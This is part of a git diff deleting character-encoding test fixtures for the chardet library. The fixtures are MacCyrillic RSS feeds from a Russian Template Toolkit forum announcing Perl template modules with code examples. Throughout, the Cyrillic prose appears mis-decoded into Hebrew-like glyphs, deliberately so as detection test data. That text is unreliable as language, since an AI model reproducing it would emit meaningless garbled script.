(לכמ|רטכמ)' - replacement = '$2 םא $1' - global = 1 %] -[% FILTER $filt %] -רטכמ םא לכמ -[% END %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-115.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-115.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - Sat, 1 Oct 2005 06:52:16 GMT - Template::Plugin::ASCIITable - גגמה עוךסעמגץ עאבכטצ - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - א CPAN מןףבכטךמגאםא גונסט 0.1 <a target="_blank" href="http://search.cpan.org/~dakkar/Template-Plugin-ASCIITable/">למהףכ Template::Plugin::ASCIITable</a>, ךמעמני ןמחגמכוע נטסמגאע עוךסעמגו עאבכטצ.<br /><br /><div class="code"><pre>[% - USE ASCIITable; - ASCIITable.cols('a', 'b', 'c'); - ASCIITable.rows([1,2,3],['one','two','three']); - ASCIITable.draw() -%]</pre></div><br />‚גמה:<br /><br /><div class="code"><pre> -.=----+-----+------=. -| a | b | c | -|=----+-----+------=| -| 1 | 2 | 3 | -| one | two | three | -'=----+-----+------='</pre></div><br /><br />כאדטם ןמחגמכוע םאסענאטגאע ןאנאלוענ עאבכטצ, א עאךזו סמחהאגאע סמבסעגוםםו סעטכט נאלמך. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-111.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-111.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - Thu, 21 Jul 2005 05:47:32 GMT - Template::Plugin::Perl - ‎ךסןמנע נהא פףםךצטי Perl ג ראבכמם - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - א CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-Perl/">למהףכ Template::Plugin::Perl</a>, ןנוהמסעאגכ‏שטי נה ןמכוחםץ פףםךצטי Perl.<br /><br /><div class="code"><pre>[% USE Perl %] -[% Perl.log(100) %] -[% Perl.rand(1) %] -[% Perl.exp(2) %] -[% Perl.sprintf(&quot;%.0f&quot;, 3.5) %] -[% Perl.pow(2, 3) %] # 2 ** 3; -[% Perl.eval('2**3') %] -[% Perl.sin(3.14) %] -[% Perl.cos(0) %] -[% Perl.join(',', 'a', 'b', 'c') %] -[% list = ['a','b','c']; - Perl.join(',' list) %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-102.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-102.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - Thu, 21 Jul 2005 04:37:32 GMT - Template::Plugin::POSIX - POSIX פףםךצטט ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - א CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~agent/Template-Plugin-POSIX/">למהףכ Template::Plugin::POSIX</a>. מהףכ ןמחגמכוע טסןמכחמגאע ג ראבכמםאץ פףםךצטט POSIX.<br /><br /><div class="code"><pre>[% USE POSIX %] -[% POSIX.log(100) %] -[% POSIX.rand(1) %] -[% POSIX.exp(2) %] -[% POSIX.sprintf(&quot;%.0f&quot;, 3.5) %] -[% POSIX.pow(2, 3) %] -[% POSIX.ceil(3.8) %] -[% POSIX.floor(3.8) %] -[% POSIX.sin(3.14) %] -[% POSIX.cos(0) %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-101.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-101.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - Mon, 11 Jul 2005 04:05:37 GMT - Template::Plugin::Decode - ןנומבנאחמגאםטו גגמהא ג Unicode - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - א CPAN מןףבכטךמגאם <a target="_blank" href="http://search.cpan.org/~lyokato/Template-Plugin-Decode/">למהףכ Template::Plugin::Decode</a>, ךמעמני ןנוהמסעאגכוע סןמסמב ןנומהמכוע סכמזםמסעט ס טסןמכחמגאםטול ג ראבכמםאץ UTF-8.<br /><br /><div class="code"><pre>‚םאקאכו [% USE Decode %]. -‡אעול למזםמ טסןמכחמגאע פטכענ 'decode'. -עמע פטכענ ןנומבנאחףוע סענמךף טח UTF-8 גמ גםףענוםםטי unicode-פמנלאע Perl: -[% multibyte_str | decode %]</pre></div><br />€געמנ למהףכ ןנוהכאדאוע סכוהף‏שטי ןמהץמה. ‚ ךאקוסעגו ךמהטנמגךט ראבכמםמג טסןמכחףועס UTF-8. ”איכ המכזם סמהונזאע BOM-חאןטס. ‚סו גץמהםו האםםו הוךמהטנף‏עס פטכענמל decode. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-96.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-96.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - Sat, 2 Jul 2005 06:41:54 GMT - Template::Plugin::XSLT - XSLT-ןנומבנאחמגאםטו XML - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - א CPAN מןףבכטךמגאםא גונסט 1.2 <a target="_blank" href="http://search.cpan.org/~scott/Template-Plugin-XSLT/">למהףכ Template::Plugin::XSLT</a>, ג ךמעמנמל נואכטחמגאם פטכענ, ןמחגמכ‏שטי ןנמטחגמהטע XSLT-ןנומבנאחמגאםט פנאדלוםעא XML.<br /><br /><div class="code"><pre>[% USE transform = XSLT(&quot;stylesheet.xsl&quot;); %] - ... -[% foo.as_xml | $transform foo = '&quot;bar&quot;' baz = 123 %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-94.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-94.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - Tue, 24 May 2005 11:28:04 GMT - Template::Plugin::NakedBody - גהוכוםטו BODY-סמסעאגכ‏שוי HTML-המךףלוםעא - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - א CPAN מןףבכטךמגאםא גונסט 0.02 <a target="_blank" href="http://search.cpan.org/~adamk/Template-Plugin-NakedBody/">למהףכ Template::Plugin::NakedBody</a>. „אםםי למהףכ נואכטחףוע פטכענ, ךמעמני גהוכוע סמהונזטלמו HTML-המךףלוםעא לוזהף עודאלט &lt;BODY&gt; ט &lt;/BODY&gt;. אך םאןטסאםמ ג המךףלוםעאצטט ‎עמ מךאחגאועס ףהמבםמ ןנט נאבמעו ס הטחאיםונאלט. נט גךכ‏קוםטט ןמהדמעמגכוםםץ טלט המךףלוםעמג םוע םומבץמהטלמסעט המןמכםטעוכםמ נוהאךעטנמגאע המךףלוםע.<br /><br /><div class="code"><pre># included.html -# ‚ html-נוהאךעמנו ףהמבםמ נאבמעאע ס ןמכםל המךףלוםעמל -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -—עמב גטהוע ןנאגטכםמ ‎עמע ךמםעוםע םףזם עאבכטצ סעטכוי. -&lt;/body&gt; -&lt;/html&gt; - -# mypage.html -[% USE NakedBody %] -&lt;html&gt; -&lt;head&gt; -&lt;style ...&gt; -&lt;/head&gt; -&lt;body&gt; -מםעוםע טסץמהםמדמ המךףלוםעא. -‡אעול גךכ‏קאועס המךףלוםע, ןמהדמעמגכוםםי הטחאיםונמל. -[% INCLUDE included.html | NakedBody %] -נמהמכזוםטו טסץמהםמדמ המךףלוםעא. -&lt;/body&gt; -&lt;/html&gt;</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-88.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-88.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - Sat, 21 May 2005 08:04:46 GMT - CGI::Application::Plugin::AnyTemplate - טםעונפויס ך מסםמגםל סטסעולאל ראבכמםמג - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/M/MG/MGRAHAM/CGI-Application-Plugin-AnyTemplate-0.04.tar.gz">גונסט 0.04 למהףכ CGI::Application::Plugin::AnyTemplate</a>. „אםםי למהףכ סמהונזטע מבמבשוםםי טםעונפויס הכ נאבמע ס כ‏במי טחגוסעםמי סטסעולמי ראבכמםמג Perl (ג םאסעמשטי למלוםע ןמההונזטגא‏עס <span style="font-weight:bold">HTML::Template</span>, <span style="font-weight:bold">HTML::Template::Expr</span>, <span style="font-weight:bold">Petal</span> ט <span style="font-weight:bold">Template Toolkit</span>) טח ןנטכמזוםטי, טסןמכחף‏שטץ ג ךאקוסעגו ךמםענמככונא CGI::Application. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-87.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-87.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - Sun, 15 May 2005 14:37:34 GMT - Inline::TT - גךכ‏קוםטו ראבכמםמג ג סךנטןע - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - א CPAN מןףבכטךמגאםא גונסט 0.04 <a target="_blank" href="http://search.cpan.org/~philcrow/Inline-TT/">למהףכ Inline::TT</a>, ךמעמני ןמחגמכוע גךכ‏קאע ראבכמם ג סךנטןע ס סמץנאםוםטול גמחלמזםמסעט ךורטנמגאםט מעךמלןטכטנמגאםםץ ראבכמםמג.<br /><br /><div class="code"><pre> -use Inline TT =&gt; 'DATA'; - -# טלוםא בכמךמג ‎ךסןמנעטנף‏עס ךאך פףםךצטט -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;; - -__DATA__ -__TT__ -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %]</pre></div><br /><div class="code"><pre>use Inline TT =&gt; &lt;&lt; EO_TEMPLATE -[% BLOCK hello %] -&lt;H1&gt; Hello [% name %], how are you? &lt;/H1&gt; -[% END %] -[% BLOCK goodbye %] -&lt;H1&gt; Goodbye [% name %], have a nice day. &lt;/H1&gt; -[% END %] -EO_TEMPLATE - -print hello( { name =&gt; 'Rob' } ), &quot;\n&quot;; -print goodbye( { name =&gt; 'Rob' } ), &quot;\n&quot;;</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-84.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-84.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - Sat, 7 May 2005 12:41:26 GMT - Template::Plugin::HTML::Prototype - דוםונאצט Ajax-ךמהא ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/B/BA/BAUERB/Template-Plugin-HTML-Prototype-0.01.tar.gz">גונסט 0.01 למהףכ Template::Plugin::HTML::Prototype</a>. „אםםי למהףכ ןנוהמסעאגכוע טםעונפויס ך למהףכ‏ HTML::Prototype, ךמעמני סמהונזטע פףםךצטט הכ דוםונאצטט ךמהא <a target="_blank" href="http://prototype.conio.net/">Javascript-בטבכטמעוךט Prototype</a>. Prototype טסןמכחףועס ג קאסעםמסעט ג <span style="font-weight:bold">Ruby on Rails</span> ט סמהונזטע מבתוךעםמ-מנטוםעטנמגאםםף‏ נואכטחאצט‏ <span style="font-weight:bold">Ajax</span>.<br /><br /><div class="code"><pre> [% USE proto = HTML::Prototype %] - - [% proto.define_javascript_functions %] - [% proto.form_remote_tag(...) %] - [% proto.link_to_function(...) %] - [% proto.link_to_remote(...) %] - [% proto.observe_field(...) %] - [% proto.observe_form(...) %] - [% proto.periodically_call_remote(...) %] - [% proto.submit_to_remote(...) %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-81.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-81.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - Tue, 12 Apr 2005 12:23:30 GMT - Template::Multilingual - ןמההונזךא םוסךמכךטץ חךמג ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CH/CHOLET/Template-Multilingual-0.02.tar.gz">גונסט 0.02 למהףכ Template::Multilingual</a>. עמע למהףכ גכועס ןנמטחגמהםל מע Template ט ןנוהכאדאוע נואכטחאצט‏ ןמההונזךט םוסךמכךטץ חךמג ג ראבכמםאץ.<br /><br />מה:<br /><div class="code"><pre>use Template::Multilingual; -my $template = Template::Multilingual-&gt;new(); -$template-&gt;language('en'); -$template-&gt;process('example.ttml');</pre></div><br />˜אבכמם:<br /><div class="code"><pre> -&lt;t&gt; - &lt;en&gt;Hello!&lt;/en&gt; - &lt;fr&gt;Bonjour!&lt;/fr&gt; - &lt;ru&gt;נטגוע!&lt;/ru&gt; -&lt;/t&gt;</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-75.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-75.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - Mon, 4 Apr 2005 06:03:55 GMT - Template::Plugin::TagRescue - ןכאדטם הכ גהוכוםט עודמג html ס טסךכ‏קוםטול - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - ןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-TagRescue-0.06.tar.gz">גונסט 0.06 למהףכ Template::Plugin::TagRescue</a>. מהףכ גהוכוע ןנט גגמהו (ע.ו. חאלוםוע &lt; &gt; &amp; &quot; םא סממעגועסגף‏שטו entities) עודט html חא טסךכ‏קוםטול ףךאחאםםץ.<br /><br /><div class="code"><pre>[% USE TagRescue %] - -[% FILTER html_except_for('b') -%] -&lt;B&gt;†טנםי!&lt;/B&gt; and &lt;I&gt;ףנסטג!&lt;/I&gt;&lt;BR&gt; -[%- END %] - -# ‚גמה: -# &lt;B&gt;†טנםי!&lt;/B&gt; and &amp;lt;I&amp;gt;Italic!&amp;lt;/I&amp;gt;&amp;lt;BR&amp;gt; - -[% '&lt;B&gt;†טנםי!&lt;/B&gt; and &lt;I&gt;ףנסטג!&lt;/I&gt;&lt;BR&gt;' | html_except_for('i','br') %] - -# ‚גמה: -# &amp;lt;B&amp;gt;Bold!&amp;lt;/B&amp;gt; and &lt;I&gt;Italic!&lt;/I&gt;&lt;BR&gt; - -[% taglist = ['b', 'br']; '&lt;B&gt;†טנםי!&lt;/B&gt; ט &lt;I&gt;ףנסטג!&lt;/I&gt;&lt;BR&gt;' | html_except_for(taglist) %] - -# ‚גמה: -# &lt;B&gt;†טנםי!&lt;/B&gt; ט &amp;lt;I&amp;gt;ףנסטג!&amp;lt;/I&amp;gt;&lt;BR&gt;</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-74.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-74.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - Tue, 29 Mar 2005 12:46:04 GMT - Template::Plugin::HTML::BBCode - ןנומבנאחמגאםטו BBCode ג HTML - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/L/LI/LIOL/Template-Plugin-HTML-BBCode-0.01.tar.gz">גונסט 0.01 למהףכ Template::Plugin::HTML::BBCode</a>. מהףכ גכועס מבונעךמי גמךנףד למהףכ HTML::BBCode ט ןנוהמסעאגכוע פטכענ bbcode, ךמעמני חאלוםוע עודט נאחלועךט BBCode םא סממעגועסגעף‏שטו עודט HTML.<br /><br /><div class="code"><pre>[%- USE HTML::BBCode -%] -[% FILTER bbcode %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %] - -[%- USE HTML::BBCode( 'bbcode_limited' - allowed_tags = [ 'b', 'i', 'u' ] -) -%] -[% FILTER bbcode_limited %] -&#91;b]BBCode&#91;/b] - is simple &#91;i]markup language&#91;/i] used in -&#91;url=http://www.phpbb.com/]phpBB&#91;/url]. -[% END %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-72.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-72.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - Sun, 27 Mar 2005 11:07:13 GMT - Template::Plugin::DBM::Deep - טםעונפויס ך pure perl DBM - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/M/ME/MERLYN/Template-Plugin-DBM-Deep-0.02.tar.gz">גונסט 0.02 למהףכ Template::Plugin::DBM::Deep</a>. מהףכ ןנוהמסעאגכוע טםעונפויס ך למהףכ‏ DBM::Deep.<br /><br /><div class="code"><pre> - [% USE db = DBM.Deep(file = &quot;my.db&quot; locking = 1 autoflush = 1); - db.lock; - db.flintstones = { &quot;flintstone&quot; = [&quot;fred&quot; &quot;wilma&quot;] - &quot;rubble&quot; = [&quot;barney&quot; &quot;betty&quot;] }; - db.castaways = [&quot;gilligan&quot; &quot;skipper&quot; &quot;professor&quot; &quot;and the rest&quot; ]; - db.unlock; - -%] - ... - [% db.flintstones.rubble.0; %] -- barney - [% db.castaways.3; %] -- and the rest -</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-71.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-71.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - Mon, 14 Mar 2005 12:35:02 GMT - ExtUtils::ModuleMaker::TT - ןמהדמעמגךא למהףכ ך הטסענטבףצטט טח TT-ראבכמםמג - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/D/DA/DAGOLDEN/ExtUtils-ModuleMaker-TT-0.74.tar.gz">גונסט 0.74 למהףכ ExtUtils::ModuleMaker::TT</a>. מהףכ ןמחגמכוע סענמטע סעאםהאנעםו פאיכ, גץמהשטו ג סמסעאג הטסענטבףעטגא למהףכ (README, Changes, Todo, Build.PL, Makefile.PL, Proxy_Makefile.PL, MANIFEST.SKIP, test.t, module.pm), טח ראבכמםמג TT. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-68.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-68.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - Mon, 14 Mar 2005 12:21:55 GMT - Template::Plugin::String::Compare - סנאגםוםטו סענמך - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/T/TA/TANIMOTO/Template-Plugin-String-Compare-0.01.tar.gz">גונסט 0.01 ןכאדטםא Template::Plugin::String::Compare</a>, ךמעמני ןמחגמכוע סנאגםטגאע סענמךט ג סענמךמגמל ךמםעוךסעו.<br /><br /><div class="code"><pre> -[% IF '2005-03-01' &lt; '2005-04-01' %] -’אךמו סנאגםוםטו ןנמגמהטעס ג קטסכמגמל ךמםעוךסעו. -[% END %] - -[% USE String.Compare %] -[% IF String.Compare.new('2005-03-01') &lt; '2005-04-01' %] -עמ סנאגםוםטו ןנמטסץמהטע ג סענמךמגמל ךמםעוךסעו. -[% END %] -</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-67.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-67.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - Sat, 19 Feb 2005 08:23:15 GMT - ‘נוהא הכ נאחנאבמעךט eCommerece ןנטכמזוםטי Handel - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - א CPAN מןףבכטךמגאם <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CL/CLACO/Handel-0.04.tar.gz">למהףכ Handel (גונסט 0.04)</a>. עמע למהףכ ןנוהמסעאגכוע סנוהף הכ נאחנאבמעךט eCommerece ןנטכמזוםטי ס ןמההונזךמי AxKit ט Template Toolkit. - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-63.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-63.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - Thu, 17 Feb 2005 07:27:20 GMT - Template::Plugin::SSI - טסןמכחמגאםטו SSI ג ראבכמםאץ - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - א CPAN מןףבכטךמגאםא <a target="_blank" href="http://backpan.cpan.org/authors/id/C/CO/COREY/Template-Plugin-SSI-0.11.tar.gz">גונסט 0.11 Template::Plugin::SSI</a>. מהףכ גכועס מבונעךמי גמךנףד CGI::SSI ט ןמחגמכוע טסןמכחמגאע ג ראבכמםאץ SSI-הטנוךעטג.<br /><br /><div class="code"><pre>[% USE SSI %] - -# גךכ‏קוםטו (virtual) פאיכא /foo/bar.inc.html -[% SSI.include('virtual', '/foo/bar.inc.html') %] - -# גךכ‏קוםטו פאיכא /foo/bar.inc.html -[% SSI.include('file', '/var/www/html/foo/bar.inc.html') %] - -# גןמכםטע ךמלאםהף -[% SSI.exec('cmd', 'ls') %] - -# גןמכםטע cgi סךנטןע -[% SSI.exec('cgi', '/cgi-bin/foo.cgi') %] - -# ףסעאםמגטע ןונולוםםף‏ ךמםפטדףנאצטט ('sizefmt', 'timefmt', טכט 'errmsg') -[% SSI.config('timefmt', &quot;%Y&quot;) %] - -# גגוסעט םאבמנ ןונולוםםף‏ מךנףזוםט -[% SSI.echo('DATE_LOCAL') %] - -# ףסעאםמגטע כמךאכםף‏ ןונולוםםף‏ ($name = 'Corey') -[% SSI.set('name', 'Corey') %] - -# גגוסעט האעף ןמסכוהםוי למהטפטךאצטט 'index.html' -[% SSI.flastmod('file', 'index.html') %] - -# גגוסעט נאחלונ פאיכא 'index.html' -[% SSI.fsize('file', 'index.html') %]</pre></div> - - ‹מבאםמג ˆדמנ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-62.html - Template Toolkit - בטבכטמעוךא הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_topic/topic_id-62.html?rss - - - diff --git a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.8.xml b/chardet/tests/MacCyrillic/forum.template-toolkit.ru.8.xml deleted file mode 100644 index 3311beb..0000000 --- a/chardet/tests/MacCyrillic/forum.template-toolkit.ru.8.xml +++ /dev/null @@ -1,228 +0,0 @@ - - - - - ”מנףל Template Toolkit : טבכטמעוךט הכ נאבמע ס ראבכמםאלט ג Perl - http://forum.template-toolkit.ru/view_forum/forum_id-8.html?rss - Template Toolkit - בסענא, למשםא ט נאסרטנולא סטסעולא מבנאבמעךט ראבכמםמג. א סאיעו נאבמעאוע פמנףל, ג ךמעמנמל מבסףזהא‏עס גמןנמס טסןמכחמגאםט בטבכטמעוךט ןמ נאבמעו ס ראבכמםאלט. Text::Template, HTML::Template, Mason ט הנףדטו בטבכטמעוךט - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Thu, 17 Mar 2005 12:03:32 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ראבכמם ג perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - Tue, 28 Dec 2004 19:07:19 GMT - אחהוכוםטו ךמהא, ןנוהסעאגכוםט, ט ךמםפטדףנאצטט - http://forum.template-toolkit.ru/view_topic/topic_id-53.html?rss - א <a target="_blank" href="http://www.theperlreview.com/">Perl Review</a> מןףבכטךמגאםא סעאע נאיאםא הו ”מ (brian d foy) &quot;Separating Code, Presentation, and Configuration&quot;. טזו ןנטגמהטעס ןונוגמה סעאעט.<br /><br /><span style="font-weight:bold">נאעךטי מבחמנ.</span><br /><br /> גחכ ןנמדנאללף טח ןנוההףשוי סעאעט ט נאחהוכטכ ךמה, ןנוהסעאגכוםטו ט ךמםפטדףנאצט‏, קעמב סהוכאע ןנמדנאללף במכוו דטבךמי ט כודךמי הכ ןמההונזךט.<br /><br /><span style="font-weight:bold">1. ‚גוהוםטו.</span><br /><br />‚ ןמסכוהםול גןףסךו ןנוהסעאגטכ ןנמדנאללף, ךמעמנף‏ טסןמכחף‏ הכ עמדמ, קעמב חאבטנאע ט מעמבנאזאע Rich Site Summaries (RSS) ס הנףדטץ גוב-סאיעמג<span style="font-weight:bold"><sup>1</sup></span>. ‚ ךמהו טסןמכחמגאכ כטעונאכםו גוכטקטם, קעמב ףךאחאע ךאךטו פאיכ חאדנףזאע ט ךאך ןנוהסעאגכע האםםו, ט מבושאכ קעמ ג ‎עמל גןףסךו ‎עמ טסןנאגכ‏.<br /><br /><span style="font-style:italic">‹טסעטםד 1</span> סמהונזטע ןנמדנאללף, ךמעמנף‏ ןנוהסעאגככ ג ןנוההףשול גןףסךו. ‚ לאססטגו <span style="font-weight:bold">@files</span> ץנאםעס פאיכ, ךמעמנו םומבץמהטלמ חאדנףחטע, <span style="font-weight:bold">$base</span> - ךאעאכמד, דהו סמץנאםועס גגמה, ט םוסךמכךמ גנאזוםטי <span style="font-weight:bold">print</span> סמחהא‏ע HTML ס ןמהסעאםמגךמי ןנמסעץ ןונולוםםץ (קעמ ןנוהןמקעטעוכםוו סךאזול קול טסןמכחמגאע HTML-פףםךצטט למהףכ CGI). עמ םודטבךטי ט ענףהםי הכ סמןנמגמזהוםט ךמה. מדהא חאץמקף ןמלוםע סןטסמך סאיעמג טכט גגמה, נטסךף‏ סכמלאע ןנמדנאללף, וסכט םאבונף קעמ-עמ םוןנאגטכםמ טכט סהוכא‏ הנףדף‏ מרטבךף.<br /><br /><span style="font-style:italic">‹טסעטםד 1: ‡אדנףחקטך RSS ס זוסעךמןנמןטסאםםלט חםאקוםטלט.</span><br /><div class="code"><pre>1 #!/usr/bin/perl -w -2 use strict; -3 -4 use LWP::Simple; -5 use XML::RSS; -6 -7 my @files = qw( -8 http://use.perl.org/useperl.rss -9 http://search.cpan.org/rss/search.rss -10 http://jobs.perl.org/rss/standard.rss -11 http://www.perl.com/pace/perlnews.rdf -12 http://www.perlfoundation.org/perl-foundation.rdf -13 http://www.stonehenge.com/merlyn/UnixReview/ur.rss -14 http://www.stonehenge.com/merlyn/WebTechniques/wt.rss -15 http://www.stonehenge.com/merlyn/LinuxMag/lm.rss -16 ); -17 -18 my $base = '/usr/home/comdog/TPR/rss-html'; -19 -20 foreach my $url ( @files ) -21 { -22 my $file = $url; -23 -24 $file =~ s|.*/||; -25 -26 my $result = open my $fh, &quot;&gt; $base/$file.html&quot;; -27 -28 unless( $result ) -29 { -30 warn &quot;Could not open [$file] for writing! $!&quot;; -31 next; -32 } -33 -34 select $fh; -35 -36 my $rss = XML::RSS-&gt;new(); -37 my $data = get( $url ); -38 $rss-&gt;parse( $data ); -39 -40 my $channel = $rss-&gt;{channel}; -41 my $image = $rss-&gt;{image}; -42 -43 print &lt;&lt;&quot;HTML&quot;; -44 &lt;table 